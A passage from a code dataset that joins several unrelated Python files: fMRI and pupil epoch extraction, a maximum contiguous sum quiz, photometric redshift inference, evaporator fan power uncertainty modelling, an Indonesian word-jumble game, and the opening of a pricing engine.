'''\n df = self.BehavFrame\n behav_onsets = self.BehavFrame.loc[self.BehavFrame.event ==\n 'CHOICE_TRIAL_ONSET'].onset.values\n pupil_onsets = self.PupilFrame.loc[self.PupilFrame.message ==\n 'CHOICE_TRIAL_ONSET'].time.values\n difference = pupil_onsets / 1000 - behav_onsets\n assert difference.std() < 0.05\n switch_onsets = df.loc[df.switch != 0].onset.values\n switch_onsets_pupil = (switch_onsets + difference.mean()) * 1000\n switch_indices = self.PupilFrame.loc[self.PupilFrame.time.\n isin(switch_onsets_pupil.astype(int))].index\n assert len(switch_indices) == len(switch_onsets)\n df = self.PupilFrame.loc[:, ['message', 'biz', 'message_value',\n 'blink', 'run', 'trial_id']]\n print(df)\n pupil_switch_lock = []\n blink_mean = []\n for switch in switch_indices:\n '''\n Extract gratinglocked pupilresponse, choicelocked pupil response & choice parameters\n '''\n pupil_switch_lock.append(df.loc[np.arange(switch - 1000, switch + tw - 1000).\n astype(int), 'biz'].values)\n blink_mean.append(df.loc[np.arange(switch - 500, switch + 1500), 'blink'].mean())\n pupil_switch_lock = pd.DataFrame(pupil_switch_lock)\n print(pupil_switch_lock)\n baseline = np.matrix((pupil_switch_lock.loc[:, 0:1000].mean(axis=1))).T\n pupil_switch_lock = pd.DataFrame(np.matrix(pupil_switch_lock) - baseline)\n self.pupil_switch_lock = pupil_switch_lock\n self.pupil_parameters = pd.DataFrame({'blink': blink_mean})\n self.pupil_parameters['TPR'] = self.pupil_switch_lock.loc[:, 500:2500].mean(axis=1)\n\n def fmri_epochs(self, basel=2000, te=6):\n roi = self.BrainstemRois\n roi = roi.loc[:, ['aan_dr', 'zaborsky_bf4',\n 'zaborsky_bf123', 'keren_lc_1std', 'NAc', 'SNc',\n 'VTA', '4th_ventricle']]\n dt = pd.to_timedelta(roi.index.values * 1900, unit='ms')\n roi = roi.set_index(dt)\n target = roi.resample('100ms').mean().index\n roi = pd.concat([fa.interp(dt, roi[c], target) for c in roi.columns], axis=1)\n behav = self.switch_behavior\n onsets = behav.onset.values\n evoked_run = defaultdict(list)\n for onset in onsets:\n cue = pd.Timedelta(onset, unit='s').round('ms')\n bl = pd.Timedelta(basel, unit='ms')\n baseline = roi.loc[cue - bl: cue + bl].mean()\n task_evoked = roi.loc[cue - bl: cue + bl * te] - baseline\n for col in task_evoked.columns:\n evoked_run[col].append(task_evoked[col].values)\n for key, values in evoked_run.items():\n df = pd.DataFrame(values)\n evoked_run[key] = df\n self.roi_epochs = evoked_run\n\n def merge(self):\n '''\n Merge everything. And Save.\n '''\n self.pupil_switch_lock.columns =\\\n pd.MultiIndex.from_product([['pupil'], ['switch_lock'],\n range(self.pupil_switch_lock.shape[1])],\n names=['source', 'type', 'name'])\n self.pupil_parameters.columns =\\\n pd.MultiIndex.from_product([['pupil'], ['parameters'],\n self.pupil_parameters.columns],\n names=['source', 'type', 'name'])\n self.switch_behavior.columns =\\\n pd.MultiIndex.from_product([['behavior'], ['parameters'],\n self.switch_behavior.columns],\n names=['source', 'type', 'name'])\n self.point_kernels.columns =\\\n pd.MultiIndex.from_product([['behavior'], ['points'],\n range(self.point_kernels.shape[1])],\n names=['source', 'type', 'name'])\n master = pd.concat([self.pupil_switch_lock,\n self.pupil_parameters,\n self.switch_behavior,\n self.point_kernels], axis=1)\n master = master.set_index([master.behavior.parameters.onset])\n singles = []\n for key, frame in self.roi_epochs.items():\n frame.columns = pd.MultiIndex.from_product([['fmri'], [key],\n frame.columns],\n names=['source', 'type', 'name'])\n singles.append(frame)\n fmri = pd.concat(singles, axis=1)\n self.master = pd.merge(fmri.set_index(master.index, drop=True).reset_index(),\n master.reset_index())\n\n\ndef execute(subject, session, run, task, flex_dir,\n BehavFrame, PupilFrame, BrainstemRois):\n c = Choiceframe(subject, session, run, flex_dir,\n BehavFrame, PupilFrame, BrainstemRois)\n c.choice_behavior()\n if task == 'inference':\n c.points()\n elif task == 'instructed':\n c.point_kernels = pd.DataFrame(np.zeros((c.switch_behavior.shape[0], 11)))\n c.choice_pupil()\n c.fmri_epochs()\n c.merge()\n return c.master\n\n\n'''\nbehav = pd.read_hdf('/Volumes/flxrl/FLEXRULE/SubjectLevel/sub-17/BehavFrame_sub-17_ses-2.hdf', key='inference_run-4')\npupil = pd.read_hdf('/Volumes/flxrl/FLEXRULE/pupil/linear_pupilframes/PupilFrame_17_ses-2.hdf', key='/inference_run-4')\nbrain = pd.read_hdf('/Volumes/flxrl/FLEXRULE/SubjectLevel/sub-17/BrainstemRois_sub-17_ses-2.hdf', key='inference_run-4')\nmaster = execute('sub-17', 'ses-2', 'inference_run-4', 'inference', '/Volumes/flxrl/FLEXRULE/', behav, pupil, brain)\n'''\n","sub_path":"decim/fmri_workflow/SwitchEpochs.py","file_name":"SwitchEpochs.py","file_ext":"py","file_size_in_byte":7850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"303148000","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 16 19:26:56 2017\n\n@author: newuser\n\"\"\"\n\ndef max_contig_sum(L):\n \"\"\" L, a list of integers, at least one positive\n Returns the maximum sum of a contiguous subsequence in L \"\"\"\n\n \"\"\"\n for example:\n in the list [3, 4, -1, 5, -4], the maximum sum is 3+4-1+5 = 11\n in the list [3, 4, -8, 15, -1, 2], the maximum sum is 15-1+2 = 16\n \"\"\" \n \n best = 0 \n candidate = 0\n\n for i in range(len(L)+1):\n for j in range(len(L)+1):\n candidate = sum(L[i:j])\n if candidate > best:\n best = candidate\n \n return best\n\n","sub_path":"Quiz/max_contig_sum.py","file_name":"max_contig_sum.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"227505105","text":"def check_prob_params(params):\n \"\"\"\n Sets parameter values pertaining to components of probability\n\n Parameters\n ----------\n params: dict\n dictionary containing key/value pairs for probability\n\n Returns\n -------\n params: dict\n dictionary containing key/value pairs for probability\n \"\"\"\n if 'prior_mean' not in params:\n params['prior_mean'] = 'interim'\n else:\n params['prior_mean'] = params['prior_mean'][0]\n if 'no_prior' not in params:\n params['no_prior'] = 0\n else:\n params['no_prior'] = int(params['no_prior'][0])\n if 'no_data' not in params:\n params['no_data'] = 0\n else:\n params['no_data'] = int(params['no_data'][0])\n return params\n\n# def make_true_nz(test_name):\n# \"\"\"\n# Function to create true redshift distribution to be shared among several\n# test cases\n#\n# Parameters\n# ----------\n# test_name: string\n# name used to look up parameters for making true_nz\n#\n# Returns\n# -------\n# true_nz: chippr.gmix object\n# gaussian mixture probability distribution\n#\n# Notes\n# -----\n# test_name is currently ignored but will soon be used to load parameters for making true_nz instead of hardcoded values.\n# \"\"\"\n# true_amps = np.array([0.20, 0.35, 0.55])\n# true_means = np.array([0.5, 0.2, 0.75])\n# true_sigmas = np.array([0.4, 0.2, 0.1])\n#\n# true_nz = chippr.gmix(true_amps, true_means, true_sigmas, limits=(0., 1.))\n#\n# return true_nz\n\ndef set_up_prior(data, params):\n \"\"\"\n Function to create prior distribution from data\n\n Parameters\n ----------\n data: dict\n catalog dictionary containing bin endpoints, log interim prior, and log\n interim posteriors\n params: dict\n dictionary of parameter values for creation of prior\n\n Returns\n -------\n prior: chippr.mvn object\n prior distribution as multivariate normal\n \"\"\"\n zs = data['bin_ends']\n log_nz_intp = data['log_interim_prior']\n log_z_posts = data['log_interim_posteriors']\n\n z_difs = zs[1:]-zs[:-1]\n z_mids = (zs[1:]+zs[:-1])/2.\n n_bins = len(z_mids)\n\n n_pdfs = len(log_z_posts)\n\n a = 1.# / n_bins\n b = 3.#1. / z_difs ** 2\n c = 3.e-2#a / n_pdfs\n prior_var = np.eye(n_bins)\n for k in range(n_bins):\n prior_var[k] = a * np.exp(-0.5 * b * (z_mids[k] - z_mids) ** 2)\n prior_var += c * np.identity(n_bins)\n\n prior_mean = log_nz_intp\n prior = mvn(prior_mean, prior_var)\n if params['prior_mean'] == 'sample':\n new_mean = prior.sample_one()\n prior = mvn(new_mean, prior_var)\n print(params['prior_mean'], prior_mean, new_mean)\n else:\n print(params['prior_mean'], prior_mean)\n\n return (prior, prior_var)\n\ndef do_inference(given_key):\n \"\"\"\n Function to do inference from a catalog of photo-z interim posteriors\n\n Parameters\n ----------\n given_key: string\n name of test case to be run\n \"\"\"\n test_info = all_tests[given_key]\n test_name = test_info['name']\n\n test_name = test_name[:-1]\n param_file_name = test_name + '.txt'\n\n params = chippr.utils.ingest(param_file_name)\n params = check_prob_params(params)\n params = defaults.check_inf_params(params)\n print(params)\n\n test_dir = os.path.join(result_dir, test_name)\n simulated_posteriors = catalog(params=param_file_name, loc=test_dir, prepend=test_name)\n saved_location = 'data'\n saved_type = '.txt'\n data = simulated_posteriors.read(loc=saved_location, style=saved_type)\n zs = data['bin_ends']\n z_difs = zs[1:]-zs[:-1]\n with open(os.path.join(os.path.join(test_dir, saved_location), 'true_vals.txt'), 'r') as true_file:\n true_data = csv.reader(true_file, delimiter=' ')\n true_vals = []\n for z in true_data:\n true_vals.append(float(z[0]))\n true_vals = np.array(true_vals)\n true_vals = np.histogram(true_vals, bins=zs, normed=True)[0]\n true_nz = chippr.discrete(zs, true_vals)\n\n (prior, cov) = set_up_prior(data, params)\n\n nz = log_z_dens(data, prior, truth=true_nz, loc=test_dir, prepend=test_name, vb=True)\n\n nz_stacked = nz.calculate_stacked()\n # print('stacked: '+str(np.dot(np.exp(nz_stacked), z_difs)))\n nz_mmap = nz.calculate_mmap()\n # print('MMAP: '+str(np.dot(np.exp(nz_mmap), z_difs)))\n # nz_mexp = nz.calculate_mexp()\n # print('MExp: '+str(np.dot(np.exp(nz_mexp), z_difs)))\n\n start_mmle = timeit.default_timer()\n nz_mmle = nz.calculate_mmle(nz_stacked, no_data=params['no_data'], no_prior=params['no_prior'])\n end_mmle = timeit.default_timer()-start_mmle\n print('MMLE: '+str(np.dot(np.exp(nz_mmle), z_difs))+' in '+str(end_mmle))\n\n nz_stats = nz.compare()\n nz.plot_estimators(log=True, mini=False)\n nz.plot_estimators(log=False, mini=False)\n nz.write('nz.p')\n #\n # # COMMENT OUT TO AVOID SAMPLING\n # #start_mean = mvn(nz_mmle, cov).sample_one()\n # start = prior#mvn(data['log_interim_prior'], cov)\n #\n # n_bins = len(zs) - 1\n # if params['n_walkers'] is not None:\n # n_ivals = params['n_walkers']\n # else:\n # n_ivals = 10 * n_bins\n # initial_values = start.sample(n_ivals)\n #\n # start_samps = timeit.default_timer()\n # nz_samps = nz.calculate_samples(initial_values, no_data=params['no_data'], no_prior=params['no_prior'], n_procs=1)\n # time_samps = timeit.default_timer()-start_samps\n # print('Sampled '+str(params['n_accepted'])+' after '+str(nz.burn_ins * params['n_burned'])+' in '+str(time_samps))\n #\n # nz_stats = nz.compare()\n # nz.plot_estimators(log=True, mini=False)\n # nz.plot_estimators(log=False, mini=False)\n # nz.write('nz.p')\n\nif __name__ == \"__main__\":\n\n import numpy as np\n import pickle\n import os\n import multiprocessing as mp\n\n import chippr\n from chippr import *\n\n result_dir = os.path.join('..', 'results')\n # name_file = 'which_inf_tests.txt'\n tests_to_run = ['0single_lsst ', '1single_lsst ', '2single_lsst ', '3single_lsst ']\n\n # with open(name_file) as tests_to_run:\n all_tests = {}\n for test_name in tests_to_run:\n test_info = {}\n test_info['name'] = test_name\n all_tests[test_name] = test_info\n\n nps = mp.cpu_count()\n pool = mp.Pool(nps)\n pool.map(do_inference, all_tests.keys())\n","sub_path":"research/scripts/cosmolike_inf_script.py","file_name":"cosmolike_inf_script.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"117728541","text":"#! /usr/bin/python\n\"\"\"Model the evaporator fan power consumption\nfrom H.G. data acquisition system.\"\"\"\n\nimport csv\nfrom datetime import datetime, timedelta\nimport fnmatch\nimport re\nimport pdb\n\nimport numpy as np\nfrom scipy.stats import t\n\nclass FAN_STAT:\n \"\"\" A class to store parameters for the statistics of the evaporator fan\n power estimation\n\n count : integer\n number of data points used to solve the evaporator fan\n cov : float\n coefficient of variation\n power : float\n estimated fan power consumption\n uncer_mea : float\n uncertainty of the measured fan power consumption\n uncer : float\n uncertainty of the estimated fan power consumption\n skew : float\n skewness of the distribution\n hyp : float\n results for the hypothesis testing: between 1 and -1 for unbias\n rel_dev : float\n % of uncertainty from deviation\n rel_cov : float\n % of uncertainty from covariance\n rel_train : float\n % of uncertainty from training data\n rel_input : float\n % of uncertainty from input\n rel_output : float\n % of uncertainty from output\n \"\"\"\n def __init__(self):\n self.count = -1\n self.cov = -1.0\n self.power = -1.0\n self.uncer = float('nan')\n self.uncer_mea = float('nan')\n self.skew = -1.0\n self.hyp = float('nan')\n self.rel_dev = 0.0\n self.rel_cov = 0.0\n self.rel_train = 0.0\n self.rel_input = 0.0\n self.rel_output = 0.0\n\n\ndef evap_fan_power_data(rtu):\n \"\"\"Identify the measurement and uncertainty\n of evaporator fan power consumption in\n different RTUs\n\n Inputs\n ----------\n rtu : pandas.Dataframe, required\n pandas Dataframe containing data from different RTUs,\n categorized by function analyze in hg_proc.py\n\n Returns\n -------\n rtu : pandas.Dataframe, required\n pandas Dataframe containing data from different RTUs,\n categorized by function analyze in hg_proc.py\n with addition of the following columns:\n PWR_IDF: average fan power at each data point in kW\n UNCER_PWR_IDF: uncertainty of measurement in PWR_IDF\n in kW\n RT_IDF: Number of time stamps for the data point,\n mark at the LAST time stamp at each data point\n \"\"\"\n\n u_energy = 0.05 # uncertainty at each data point = 0.05 kWh\n u_time = 0.0 # uncertainty at each time stamp = 30s\n IDF_name = 'IDF'\n pow_name = ''.join(['PWR_', IDF_name])\n uncer_name = ''.join(['UNCER_', pow_name])\n rt_name = ''.join(['RT_', IDF_name])\n for unit in rtu:\n # assign new columns in the rtu data for storing evap. fan power\n # flags for one data point and uncertainty of fan power\n rtu[unit][pow_name] = np.nan # in kW\n rtu[unit][uncer_name] = np.nan # in kW\n rtu[unit][rt_name] = np.nan\n\n # identify all time steps which only the evap. fan\n # is running\n cond_state = (rtu[unit].S_CMP == 0) & (rtu[unit].S_ODF == 0)\\\n & (rtu[unit].S_IDF == 1)\n rtu_temp = rtu[unit][cond_state]\n\n # find the separation of data point\n power_mea = []\n u_power_mea = []\n old_index = 0\n for i in range(1, rtu_temp.index.size):\n if (\n rtu_temp.index[i]-rtu_temp.index[i-1] != timedelta(0, 60) or\n i == rtu_temp.index.size-1\n ):\n begin = rtu_temp.index[old_index]\n end = rtu_temp.index[i-1]\n if not i-1 == old_index:\n # must contain at least 2 time stamps to avoid initial count\n # towards power of other equipment\n time = (end-begin).seconds\n energy = (rtu_temp.PWR_RTU[begin:end].sum())*3600.0\n else:\n # do not use if there are only two or less time steps\n energy = 0\n time = 0\n if energy > u_energy*3600.0:\n # only return them if there is a measurement\n # from the energy meter\n rtu[unit][begin:end][pow_name] = energy/time\n rtu[unit][begin:end][uncer_name] = \\\n np.sqrt(\n 2.0*(u_energy*3600.0/time)**2 +\n 2.0*(energy/time**2*u_time)**2\n )\n rtu[unit].RT_IDF[end] = time/60.0\n # move to the other data point\n old_index = i\n\n\ndef evap_fan_power_model(rtu, limit=0.05, begin_date=None, end_date=None):\n \"\"\"Identify the measurement and uncertainty\n of evaporator fan power consumption in\n different RTUs\n\n Inputs\n ----------\n rtu : pandas.Dataframe, required\n pandas Dataframe containing data from different RTUs,\n categorized by function analyze in hg_proc.py\n limit : double, optional\n a limit to the relative uncertainty of the evaporator fan power\n any evap. fan with relative uncertainty larger than limit will\n not be averaged\n begin_date : string, required\n beginning date of the training data\n end_date : string, optional\n ending date of the training data\n\n Returns\n -------\n fan_stat : fan_stat()\n a class containing the statistics of the estimation results\n \"\"\"\n\n if begin_date is None:\n raise Exception('Require a beginning date for evaporator modeling!')\n if end_date is None:\n end_date = begin_date\n\n fan_power = 'PWR_IDF_EST'\n uncer_fan_power = ''.join(['UNCER_', fan_power])\n STAT = {}\n\n for unit in rtu:\n # introduce statistic structure\n STAT[unit] = FAN_STAT()\n\n # valid power condition\n valid_pow = (rtu[unit].RT_IDF > 0) & \\\n (rtu[unit].UNCER_PWR_IDF/rtu[unit].PWR_IDF < limit)\n evap_state = (rtu[unit].S_IDF == 1)\n\n # mean values\n if fan_power not in rtu[unit]:\n rtu[unit][fan_power] = 0.0\n rtu[unit].PWR_IDF_EST[evap_state] = \\\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date].mean()\n\n # uncertainty values and statistics\n if uncer_fan_power not in rtu[unit]:\n rtu[unit][uncer_fan_power] = np.nan\n count = rtu[unit][valid_pow][begin_date:end_date].index.size\n mea_uncer = np.mean(\n np.array(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]\n )/np.array(\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date]\n )\n )*rtu[unit].PWR_IDF_EST[evap_state][0]\n\n STAT[unit].count = count\n STAT[unit].uncer_mea = mea_uncer/rtu[unit].PWR_IDF_EST[evap_state][0]\n STAT[unit].power = rtu[unit].PWR_IDF_EST[evap_state][0]\n if count > 1:\n t_stat = t.interval(0.95, count-1)[1]\n fan_power_std = \\\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date].std()\n rtu[unit].UNCER_PWR_IDF_EST[evap_state] = np.sqrt(\n (1.+1./count**2)*(t_stat*fan_power_std)**2+np.sum(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]**2\n )/count**2+mea_uncer**2\n )\n STAT[unit].cov = fan_power_std/STAT[unit].power\n STAT[unit].skew = \\\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date].skew()\n STAT[unit].uncer = \\\n rtu[unit][valid_pow].UNCER_PWR_IDF_EST[evap_state][0]\n STAT[unit].rel_dev = (t_stat*fan_power_std)**2/STAT[unit].uncer**2\n STAT[unit].rel_cov = \\\n (t_stat*fan_power_std)**2/STAT[unit].uncer**2/count**2\n STAT[unit].rel_train = np.sum(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]**2\n )/count**2/STAT[unit].uncer**2\n STAT[unit].hyp = (\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date] -\n rtu[unit].PWR_IDF_EST[evap_state][0]\n ).sum()/fan_power_std/t_stat/np.sqrt(count)\n else:\n rtu[unit].UNCER_PWR_IDF_EST[evap_state] = np.sqrt(\n np.sum(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]**2\n )+mea_uncer**2\n )\n STAT[unit].uncer = \\\n rtu[unit][valid_pow].UNCER_PWR_IDF_EST[evap_state][0]\n STAT[unit].rel_train = np.sum(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]**2\n )/STAT[unit].uncer**2\n STAT[unit].rel_output = mea_uncer**2/STAT[unit].uncer**2\n\n return STAT\n\n\ndef evap_fan_power_valid(rtu, limit=0.05, begin_date=None, end_date=None):\n \"\"\"Use the estimated results to create statistics for validation data\n\n Inputs\n ----------\n rtu : pandas.Dataframe, required\n pandas Dataframe containing data from different RTUs,\n categorized by function analyze in hg_proc.py\n limit : double, optional\n a limit to the relative uncertainty of the evaporator fan power\n any evap. fan with relative uncertainty larger than limit will\n not be averaged\n begin_date : string, required\n beginning date of the validation data\n end_date : string, optional\n ending date of the validation data\n\n Returns\n -------\n fan_stat : fan_stat()\n a class containing the statistics of the estimation results\n \"\"\"\n\n if begin_date is None:\n raise Exception('Require a beginning date for evaporator modeling!')\n if end_date is None:\n end_date = begin_date\n\n fan_power = 'PWR_IDF_EST'\n uncer_fan_power = ''.join(['UNCER_', fan_power])\n STAT = {}\n\n for unit in rtu:\n # introduce statistic structure\n STAT[unit] = FAN_STAT()\n\n # valid power condition\n valid_pow = (rtu[unit].RT_IDF > 0) & \\\n (rtu[unit].UNCER_PWR_IDF/rtu[unit].PWR_IDF < limit)\n evap_state = (rtu[unit].S_IDF == 1)\n\n # uncertainty values and statistics\n if uncer_fan_power not in rtu[unit]:\n rtu[unit][uncer_fan_power] = np.nan\n count = rtu[unit][valid_pow][begin_date:end_date].index.size\n mea_uncer = np.mean(\n np.array(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]\n )/np.array(\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date]\n )\n )*rtu[unit].PWR_IDF_EST[evap_state][0]\n\n STAT[unit].count = count\n STAT[unit].uncer_mea = mea_uncer/rtu[unit].PWR_IDF_EST[evap_state][0]\n STAT[unit].power = rtu[unit].PWR_IDF_EST[evap_state][0]\n if count > 1:\n t_stat = t.interval(0.95, count-1)[1]\n fan_power_std = np.sqrt(np.sum((\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date] - \n rtu[unit][valid_pow].PWR_IDF_EST[begin_date:end_date]\n )**2)/(count-1))\n STAT[unit].cov = fan_power_std/STAT[unit].power\n STAT[unit].skew = \\\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date].skew()\n STAT[unit].uncer = \\\n rtu[unit][valid_pow].UNCER_PWR_IDF_EST[evap_state][0]\n STAT[unit].hyp = (\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date] -\n rtu[unit].PWR_IDF_EST[evap_state][0]\n ).sum()/fan_power_std/t_stat/np.sqrt(count)\n else:\n STAT[unit].uncer = \\\n rtu[unit][valid_pow].UNCER_PWR_IDF_EST[evap_state][0]\n\n return STAT\n\n\nif __name__ == '__main__':\n # for testing with all data\n # debugging only\n import numpy as np\n import matplotlib.pyplot as plt\n\n import hg_proc as hg\n import evap_fan_modeling as fan\n\n # read and extract data\n df, rtu = hg.analyze('./Data/')\n fan.evap_fan_power_data(rtu)\n fan.evap_fan_power_model(\n rtu, begin_date='2013-06-20', end_date='2013-07-20'\n )\n\n # show the plots for uncertainty analysis\n for unit in rtu:\n fig = plt.figure(unit)\n plt.rc('xtick', labelsize='x-large')\n plt.rc('ytick', labelsize='x-large')\n plt.xlabel(\n 'Measured Evaporator \\n Fan Power Consumption [kW]',\n fontsize='x-large'\n )\n plt.ylabel(\n 'Measurment uncertainty [kW]', fontsize='x-large',\n multialignment='center'\n )\n plt.scatter(\n rtu[unit].PWR_IDF[rtu[unit].RT_IDF > 0],\n rtu[unit].UNCER_PWR_IDF[rtu[unit].RT_IDF > 0],\n s=30, c='b', marker='o'\n )\n plt.gcf().subplots_adjust(bottom=0.15)\n plt.gcf().subplots_adjust(left=0.15)\n graph_filename = 'Evap_fan_uncertainty'+'_'+'RTU_'+str(unit)+'.png'\n plt.savefig(graph_filename, dpi=400)\n\n # show the histogram of the power measured\n for unit in rtu:\n fig = plt.figure(unit+10)\n hist, bins = np.histogram(\n rtu[unit].PWR_IDF[rtu[unit].RT_IDF > 0],\n bins=10\n )\n width = 0.7*(bins[1]-bins[0])\n center = (bins[:-1]+bins[1:])/2\n plt.rc('xtick', labelsize='x-large')\n plt.rc('ytick', labelsize='x-large')\n plt.xlabel(\n 'Measured Evaporator \\n Fan Power Consumption [kW]',\n fontsize='x-large'\n )\n plt.ylabel('Frequency', fontsize='x-large', multialignment='center')\n plt.bar(center, hist, align='center', width=width)\n graph_filename = 'Evap_fan'+'_'+'RTU_'+str(unit)+'.png'\n plt.gcf().subplots_adjust(bottom=0.15)\n plt.gcf().subplots_adjust(left=0.15)\n plt.savefig(graph_filename, dpi=400)\n del hist, bins\n\n # show a plot of the estimated power to the measured power\n for unit in rtu:\n evap_state = (rtu[unit].RT_IDF > 0)\n fig = plt.figure(unit+100)\n plt.errorbar(\n rtu[unit].PWR_IDF[evap_state],\n rtu[unit].PWR_IDF_EST[evap_state],\n yerr=rtu[unit].UNCER_PWR_IDF_EST[evap_state],\n xerr=rtu[unit].UNCER_PWR_IDF[evap_state], fmt='bo'\n )\n plt.scatter(\n rtu[unit].PWR_IDF[evap_state],\n rtu[unit].PWR_IDF_EST[evap_state], s=30, c='b', marker='o'\n )\n plt.rc('xtick', labelsize='x-large')\n plt.rc('ytick', labelsize='x-large')\n plt.xlabel(\n 'Measured Evaporator \\n Fan Power Consumption [kW]',\n fontsize='x-large'\n )\n plt.ylabel(\n 'Predicted Evaporator \\n Fan Power Consumption [kW]',\n fontsize='x-large', multialignment='center'\n )\n graph_filename = 'Evap_fan_EST'+'_'+'RTU_'+str(unit)+'.png'\n plt.gcf().subplots_adjust(bottom=0.15)\n plt.gcf().subplots_adjust(left=0.15)\n plt.savefig(graph_filename, dpi=400)\n\n # output answers\n for unit in rtu:\n evap_state = (rtu[unit].RT_IDF > 0)\n csv_filename = 'Evap_fan_result'+'_'+'RTU_'+str(unit)+'.csv'\n ofile = open(csv_filename, 'wb')\n writersummary = csv.writer(ofile)\n writersummary.writerow(\n ['Measured Power[kW]', 'Estimated Power[kW]',\n 'Measurement Uncertainty[kW]', 'Estimation Uncertainty[kW]']\n )\n for index in rtu[unit].index[evap_state]:\n writersummary.writerow(\n [rtu[unit].PWR_IDF[index],\n rtu[unit].PWR_IDF_EST[index],\n rtu[unit].UNCER_PWR_IDF[index],\n rtu[unit].UNCER_PWR_IDF_EST[index]]\n )\n ofile.close()\n\n plt.show()\n","sub_path":"evap_fan_modeling.py","file_name":"evap_fan_modeling.py","file_ext":"py","file_size_in_byte":15887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"174872799","text":"# Challenge no. 3, Chapter 4, Python Programming for Absolute Beginner\r\n# I need to make a 'Word Jumble Game' with an improvement, which is a hint\r\n# if the user is desperate enough.\r\n# Muhammad Hadi, 24th of July 2018, written in Indonesian\r\n# Improvement(s) : -\r\n\r\n# importing random\r\n\r\nimport random\r\n\r\n# put KATA variable (tuple) that contains with words\r\n\r\nKATA = (\"kutubuku\",\"kupu-kupu\",\"kacamata\",\"ular\",\"python\",\"windows\",\"cacing besar alaska\")\r\n\r\nprint(\r\n \"\"\"\r\n\\t\\t\\tHalo! Selamat datang di permainan acak kata.\r\n\r\nAnda akan diberikan sebuah kata yang sudah diacak dan harus menyusun kata tersebut menjadi kata sebenarnya.\r\n\r\n\\nSetuju? (Yes/No)\r\n \"\"\")\r\n\r\n# jawaban is the response of the user, if they want to join (The Logang) or no:(\r\n\r\njawaban = input(\"\")\r\n\r\n# i put (jawaban) as (jawaban.lower) bcs sometimes ppl are not aware if their caps is on:(((\r\njawaban = jawaban.lower()\r\n\r\nwhile jawaban == \"yes\":\r\n print(\"\\nOke, langsung saja kita mulai! Tekan enter untuk memulai.\")\r\n input(\"\")\r\n kata_pilihan = random.choice(KATA)\r\n benar = kata_pilihan.lower()\r\n acak = \"\"\r\n\r\n# this is where we jumble the word\r\n\r\n while kata_pilihan:\r\n posisi = random.randrange(len(kata_pilihan))\r\n acak = acak + kata_pilihan[posisi]\r\n kata_pilihan = kata_pilihan[:posisi] + kata_pilihan[(posisi+1):]\r\n\r\n print(\"\\nOke, kata yang sudah diacak adalah:\", acak)\r\n jawaban_1 = input(\"Masukkan jawaban Anda: \")\r\n nilai = 100\r\n percobaan = 0\r\n \r\n while jawaban_1 != benar or jawaban_1 ==\"\":\r\n percobaan +=1\r\n nilai-=5\r\n print(\"\\nHmm, sepertinya Anda tidak menjawab dengan benar. Mau dibantu? (Ya/Tidak)\")\r\n respon = input(\"\")\r\n respon = respon.lower()\r\n if respon == \"\" or respon == \"tidak\":\r\n print(\"\\nHem, yaudah tebak lagi, deh: \")\r\n jawaban_1=input(\"\")\r\n if respon == \"ya\":\r\n print(\"Akhirnya harus buka hint, ya..\")\r\n nilai-=10\r\n if benar == \"kutubuku\":\r\n print(\"\\nBinatang penghisap darah + buku? :D\") \r\n elif benar == \"kupu-kupu\":\r\n print(\"\\nBinatang penghisap......\")\r\n elif benar == \"kacamata\":\r\n print(\"\\nGak bisa lihat kalau nggak pake ini:(( rabun:((\")\r\n elif benar == \"ular\":\r\n print(\"\\nAda spesies yang berderik\")\r\n elif benar == \"python\":\r\n print(\"\\nTerkenal dengan tipe file .py + app yang kalian gunakan untuk jalanin ini:((\")\r\n elif benar == \"windows\":\r\n print(\"\\nSalah satu sistem operasi........... jendela\")\r\n elif benar == \"cacing besar alaska\":\r\n print(\"\\nCacing di spongebob squarepants:(\")\r\n print(\"\\nUdah dapet belom? Coba tulis: \")\r\n jawaban_1=input(\"\")\r\n \r\n if jawaban_1 == benar:\r\n percobaan +=1\r\n print(\"\\nSelamat! Anda berhasil memecahkan kata yang diacak. Kata yang diacak adalah,\", benar,\"! Nilai anda\", nilai,\".\")\r\n print(\"\\nAnda berhasil melakukan ini dalam\",percobaan,\"percobaan.\")\r\n print(\"\\nIngin bermain lagi? (Ya/Tidak)\")\r\n jawaban=input(\"\")\r\n\r\n# signing out :D\r\n\r\nprint(\"\\nTerima kasih sudah membuka aplikasi ini.\")\r\nprint(\"\\nBot Hadi, signing out...\")\r\n\r\ninput(\"\\nTekan enter untuk keluar.\")\r\n \r\n","sub_path":"unfinished2.py","file_name":"unfinished2.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"226182350","text":"import json\nimport csv\nimport io\nimport time\n\nimport config\nimport core.util.debug as debug\nfrom core.pricing.jsondata import *\nfrom core.pricing.csvdata import *\nfrom core.pricing.metriccsvdata import *\nfrom core.pricing.dtjsondata import *\nfrom core.pricing.simdata import *\nfrom core.pricing.exceptions import *\nimport core.monitoring as monitor\n\n\n\nclass PricingEngine:\n\n\tcached = {}\n\n\tdef __init__(self, application_key):\n\t\timport core.content.content as content\n\t\tbackend = content.Content()\n\n\t\tself.groupAPrices = None\n\t\tself.groupBPrices = None\n\n\t\tself.abtest = 